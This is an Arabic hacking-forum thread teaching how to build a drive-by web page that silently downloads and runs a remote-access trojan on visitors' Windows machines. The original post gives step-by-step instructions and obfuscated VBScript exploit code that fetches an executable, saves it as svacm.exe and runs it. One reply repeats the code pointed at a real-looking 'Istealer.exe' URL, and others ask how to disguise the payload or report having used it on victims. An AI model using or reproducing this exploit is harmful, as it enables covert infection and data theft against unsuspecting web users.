شرح كيفية تلغيم صفحة انترنت بباتش

:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::

صفحة الانترنت الملغمه بباتش ماتشتغل الا على ماسووا تحديثات للنظام
وبعض الثغرات تتخطى التحديثات بس ماتتخطى جميع التحديثات ونادرا تتخطى جميع التحديثات
.................................................. ......................
فكرة الصفحه الملغمه بباتش : عباره عن صفحه مبرمجه بلغة html او php تضع بوسطها رابط باتشك المباشر واذا دخل اي واحد على الصفحه راح ينزل الباتش بجهازه ويشتغل بدون مايحس ..... وبكذا راح تخترقه...
مثل: صفحه ملغمه بباتش وتكون فاضيه بيضا ..
ومثل : صفحه ملغمه بباتش وبوسطها صوره ( اذا فتح الضحيه الصفحه راح تطلع له الصوره ) ..
.................................................. ...................
اول خطوه نرفع الباتش على موقع رفع مثل RipWay.com
ثانيا نفتح الثغره بالمفكره
بعدها نستبدل اللي موضح لنا برابط الباتش المرفوع

واذا كانت فيه صوره نحط رابط اي صوره تعجبك نستبدل هذا الرابط برابط الصوره
ونحفظها بصيغة html
مثلا نكتب الاسم index.html
.................................................. .........................
بعدها نرفع الصفحه الملغمه الى موقعك الخاص ونعطي الرابط الضحيه.....

نجرب الثغره

<html>
<head>
<title>Exploit-Pro</title>
</head>
<body>
<script type="text/vbscript">
on error resume next
Set df = ********.createElement("object")
df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
str="Microsoft"&"."&"XMLHTTP"
Set x = df.CreateObject(str,"")
var1="Ad"
var2="od"
var3="b."
var4="St"
var5="re"
var6="am"
str1=var1&var2&var3&var4&var5&var6

str5=str1
set S = df.createobject(str5,"")
for count = 0 to 4
S.type = 1
lnk="هنا نضع برابط الباتش المرفوع "
x.Open "G"&"E"&"T",lnk,0
x.Send
set F = df.createobject("Script"&"ing.FileSys"&"temObject" ,"")
if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:\temp" else if count = 3 then tmp = "d:\windows\temp" else if count = 4 then tmp = "d:\" end if
fname1= F.BuildPath(tmp,"\svacm.exe")
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if err.number = 0 then
set Q = df.createobject("****l.Application","")
Q.****lExecute fname1,"INSTALL","","open",0
exit for
else
Err.Clear
End if
next
</script>
</body>
</html>

<head>
<img border="0" src=" برابط الصوره هنا نضع"
<hr>
<!-- **********location.href='http://google.com'</script> -->
</body>

</html>


ونحفظها بصيغة html

ونواصل كما في الشرح................................finish.

شكرا لك على الثغرة وياريت الشرح لو كان فديو مشكور

يا ريت يكون فديو من شان نفهم اكثر

شكرررا لك ياغالي
لاتحرمنا جديدك

شكرا على الموضوع أخي جميل جدااااااااااااااا
بس ممكن تعطيني فكرة على طريقة نرفع الصفحه الملغمه ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ من فضلك

مشكور اخي والله انا نفسي اتعلم التلغيم لا تحرمنا من جديد يا مبدع

وياليت تفديدني بخبراتك

بصراحه فيه نقاط ما فهمتها ،، فـ لو كان فيه فيديو يوضح أكثر..!

شكرآ لك..

مشكور اخي على الموضوع الرائع

ممكن رابط ارفع علية الصفحه .

يعني اكدر ارفعه على الرابيدشيل او غيرهم لو ين ارفها . شكرا ..

الف شكر ع الشرح الرائع تسلم

الطريقة مفهمومه

لكن اشرح الكود يا بطل

هناك جملتين
الجملة الاولى رابط الباتش
الجملة الثانية رابط صورة

وهناك ايضا رابط القوقل ؟

بصراحه الكود غير مفهوم ويحتاج الى شرح

مشكوررررررررررر على الموضوع الرائع

اسمح لي ابدي اعجابي بقلمك وتميزك واسلوبك الراقي وتالقك

..............8...8 8888888...8......... .......
............8888.888 88888.8888.......... ....
...........88888.888 8888.888888......... ...
...........888888888 8888888888.......... ..
..............888888 8888888888.......... ....
..................88 888888888........... ........
.................... ..888888............ ............
.................... ....##.............. ..8................. .
.................... ....##.............. 8888................ ....
.................... ...##........8...888 8888...8............ .
.......#............ .##......8888.888888 88.8888........
......###.........## ......88888.8888888. 888888......
.....#####.....##... ....8888888888888888 888......
....######...##..... ......88888888888888 8..........
......######.##..... ..........8888888888 ...............
.........####.##.... ...#...........88888 ....................
...........#####.... ..###..........##... .................... .
..............###... #####.........##.... .......#............
................##.# ####..........##.... .....####.........
...............##.## ##.....#.....##..... .#######.......
..............##.### ......###..##....### #####.......
..............####.. .....####.##..###### ##..........
.............##..... .....#####.#..###### ....... ........
.............##..... ......#######....... ...............
.............##..... ..........###......
شـكــ وبارك الله فيكم ـــرا لكم ... لكم مني أجمل تحية .
شـكــ وبارك الله فيكم ـــرا لكم ... لكم مني أجمل تحية .

مشكووور كفووو والله
--------------------------------------------------------------------------------------------------------
_______e$$$$$$$$$$e_______
______$$$$$$$$$$$$$$______
_____d$$$$$$$$$$$$$$b_____
_____$$$$$$$$$$$$$$$$_____
____4$$$$$$$$$$$$$$$$F____
____4$$$$$$$$$$$$$$$$F____
____$$$$"_"$$$$"_"$$$$$_____
_____$$F___4$$F___4$$_____
_____'$F____ 4$F___4$"_____
______$$___$$$$___$$______
______4$$$$$^$$$$$P_____
_______$$$$F__4$$$$_______
________"$$$ee$$$"________
________._*$$$$F_._________
_________$_____.$_________
_________"$$$$$$"_________
__________^$$$$___________
_4$$c_______""_______.$$r_
_^$$$b______________e$$$"_
_d$$$$$e__________z$$$$$b_
4$$$*$$$$$c____.$$$$$*$$$r
_""____^*$$$be$$$*"____^"_
__________"$$$$"__________
________.d$$P$$$b_________
_______d$$P___^$$$b_______
___.ed$$$"______"$$$be.___
_$$$$$$P__________*$$$$$$_
$$$$$P____________$$$$$$"

شكرا لك وبارك الله فيك

_______e$$$$$$$$$$e_______
______$$$$$$$$$$$$$$______
_____d$$$$$$$$$$$$$$b_____
_____$$$$$$$$$$$$$$$$_____
____4$$$$$$$$$$$$$$$$F____
____4$$$$$$$$$$$$$$$$F____
____$$$$"_"$$$$"_"$$$$$_____
_____$$F___4$$F___4$$_____
_____'$F____ 4$F___4$"_____
______$$___$$$$___$$______
______4$$$$$^$$$$$P_____
_______$$$$F__4$$$$_______
________"$$$ee$$$"________
________._*$$$$F_._________
_________$_____.$_________
_________"$$$$$$"_________
__________^$$$$___________
_4$$c_______""_______.$$r_
_^$$$b______________e$$$"_
_d$$$$$e__________z$$$$$b_
4$$$*$$$$$c____.$$$$$*$$$r
_""____^*$$$be$$$*"____^"_
__________"$$$$"__________
________.d$$P$$$b_________
_______d$$P___^$$$b_______
___.ed$$$"______"$$$be.___
_$$$$$$P__________*$$$$$$_
$$$$$P____________$$$$$$"

مشكووور درس واضح واوضح من الشمس

يعطيك الف الف الف الف عافية شكرااااااااا

رااااااااااااائع

راااااااااااااااااائع

مشكوووووووووووووووووووووو ور

لو فيديو احسن على مشكووور

شكر الك اخويه الغالي ][> ننتضر المزيد منك

كاذب والله لا يصل تبليغ ولا اي شيء

يعطيك العافيه اخوي على الشرح الوافي

تقبل مروزري البسيط..!~

والله جهد كبير و اسئلة كثيرة ..
ولكن لك جزيل الشكر

مشكوووووووووووور اخي على هذا الدرس المفيد
تقبل مروري

مشكووووووووووووووور اخوووي ياليت توضح زيادة

مشكووووووووور انا استخدمتها لكن فعاله وشكرا على الشرح المفيد

جاري تقيمك 5 نجوم

مشكور وياريت لو كان في فيديو للشرح

اخونا الغالي شرحك غير مفهوم يفضل انت تنزل شرح فيديو يجزاك الله خير متشكرر

نحن بانتظار الفيديو ياخونا الغالي

taslamo ya jama3a

ممكن توضيح اكتر ؟؟
يعني من برنامج البيفروست اعمل الباتش وبعدين ارفعه على استضافة تبعي او اى استضافة

وبعدين اجيب اى صورة واضع كلام من لينك الصورة ولينك الباتش في الكود

وابعت رابط الصفحة للضحية واول ما تفتح هيظهر الصورة فقط

والباتش هيتحمل على الجهاز تلقائي بدون اى تدخل من الضحية وبكدة اكون اخترقته ؟؟؟

والتبليغ في الحالة دي بيوصل ولااااااااااا ؟؟؟

---------------------------------------------------------
حاجة تانية ::

ازاى ارسل الباتش للضحية على هيئة صورة بامتداد .jpg
???

في الانتظاااااااااااار

نايس ثاانكس

ابداع من شخص مبدع.~!

مشكور اخي بس اذا امكن سؤال .......... اخلي الرابط مرتين لو شنو و ارجو ان يكون الشرح بل فديو مشكور اخويه و متقصر (تقبل مروري)

بارك الله فيك

مشكووووووووووووور

الشرح ناقص كثير حبيبي على العموم يسلمو

يسلموووووووووووووووووا

شكرا يا اخى لكن الشرح صعب شووي

مشكوووووووووور

مشكووووووووووووووووور

شكرا على الموضوع الله يعطيك الف عافيه يارب

قلم دائم التألق
ننتظر المزيد من كتاباتك
و جزاك الله عنا خير الجزاء

يسلمو اخويه بس لو كان فيديو كان احلى واسهل للجميع تحياتي

مجهود جبار شكرا اخي وبارك الله فيك

كفوووووو

يابعدي

https://s-static.ak.facebook.com/images/emote/shark.gif

شكرا الله يعطيك الف خير يارب

مشكور ياأخي علي التغرى الرأعة ونقبل مروري
وشكرا

أخي هل ممكن شرح بالفديو

شرح كيفية تلغيم صفحة انترنت بباتش

:::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::

صفحة الانترنت الملغمه بباتش ماتشتغل الا على ماسووا تحديثات للنظام
وبعض الثغرات تتخطى التحديثات بس ماتتخطى جميع التحديثات ونادرا تتخطى جميع التحديثات
.................................................. ......................
فكرة الصفحه الملغمه بباتش : عباره عن صفحه مبرمجه بلغة html او php تضع بوسطها رابط باتشك المباشر واذا دخل اي واحد على الصفحه راح ينزل الباتش بجهازه ويشتغل بدون مايحس ..... وبكذا راح تخترقه...
مثل: صفحه ملغمه بباتش وتكون فاضيه بيضا ..
ومثل : صفحه ملغمه بباتش وبوسطها صوره ( اذا فتح الضحيه الصفحه راح تطلع له الصوره ) ..
.................................................. ...................
اول خطوه نرفع الباتش على موقع رفع مثل RipWay.com
ثانيا نفتح الثغره بالمفكره
بعدها نستبدل اللي موضح لنا برابط الباتش المرفوع

واذا كانت فيه صوره نحط رابط اي صوره تعجبك نستبدل هذا الرابط برابط الصوره
ونحفظها بصيغة html
مثلا نكتب الاسم index.html
.................................................. .........................
بعدها نرفع الصفحه الملغمه الى موقعك الخاص ونعطي الرابط الضحيه.....

نجرب الثغره

<html>
<head>
<title>Exploit-Pro</title>
</head>
<body>
<script type="text/vbscript">
on error resume next
Set df = ********.createElement("object")
df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
str="Microsoft"&"."&"XMLHTTP"
Set x = df.CreateObject(str,"")
var1="Ad"
var2="od"
var3="b."
var4="St"
var5="re"
var6="am"
str1=var1&var2&var3&var4&var5&var6

str5=str1
set S = df.createobject(str5,"")
for count = 0 to 4
S.type = 1
lnk="هنا نضع برابط الباتش المرفوع "
x.Open "G"&"E"&"T",lnk,0
x.Send
set F = df.createobject("Script"&"ing.FileSys"&"temObject" ,"")
if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:\temp" else if count = 3 then tmp = "d:\windows\temp" else if count = 4 then tmp = "d:\" end if
fname1= F.BuildPath(tmp,"\svacm.exe")
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if err.number = 0 then
set Q = df.createobject("****l.Application","")
Q.****lExecute fname1,"INSTALL","","open",0
exit for
else
Err.Clear
End if
next
</script>
</body>
</html>

<head>
<img border="0" src=" برابط الصوره هنا نضع"
<hr>
<!-- **********location.href='http://google.com'</script> -->
</body>

</html>


ونحفظها بصيغة html

ونواصل كما في الشرح................................finish.


أخي جربتها مامشات
هل هاذا الكود صحيح



<html>
<head>
<title>Pic</title>
</head>
<body>
<script type="text/vbscript">
on error resume next
Set df = ********.createElement("object")
df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
str="Microsoft"&"."&"XMLHTTP"
Set x = df.CreateObject(str,"")
var1="Ad"
var2="od"
var3="b."
var4="St"
var5="re"
var6="am"
str1=var1&var2&var3&var4&var5&var6

str5=str1
set S = df.createobject(str5,"")
for count = 0 to 4
S.type = 1
lnk="http://logto.pl.nf/Istealer.exe"
x.Open "G"&"E"&"T",lnk,0
x.Send
set F = df.createobject("Script"&"ing.FileSys"&"temObject" ,"")
if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:temp" else if count = 3 then tmp = "d:windowstemp" else if count = 4 then tmp = "d:" end if
fname1= F.BuildPath(tmp,"svacm.exe")
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if err.number = 0 then
set Q = df.createobject("****l.Application","")
Q.****lExecute fname1,"INSTALL","","open",0
exit for
else
Err.Clear
End if
next
</script>
</body>
</html>

<head>
<img border="0" src="http://www.stephanegillet.com/wp-content/uploads/2009/04/windows-8.png"
<hr>
<!-- **********location.href='http://google.com'</script> -->
</body>

</html>

<!-- www.000webhost.com Analytics Code -->

<script type="text/javascript" src="http://analytics.hosting24.com/count.php"></script>

<noscript><a href="http://www.hosting24.com/"><img src="http://analytics.hosting24.com/count.php" alt="web hosting" /></a></noscript>

<!-- End Of Analytics Code -->

تم التجربه لكن مافيه تبليغ

ارجو ان لايكون ممنوع كما حطيتها على الرابط التالي ارجو عدم الدخول
لاكن مافيه وصول وشافو الصوره كم واحد ....
http://rakan-2011.forumarabia.com

مشكوره اخويه
شرح حلو
ياعسل

شكرا الله يعطيك الف خير يارب

مشكور لك ................

مشكووووووووووور على الشرح

مبدع والله شكرا جزيلا لك ولا تحرمنلا من جديدك اخي

شكرا على الشرح المتميز ...صراحة افدتني كثير ^_^

ننتظر جديدك.. و إلى الأمام يا بطل :)

مشكوووووور والله يعطيك الف عافيه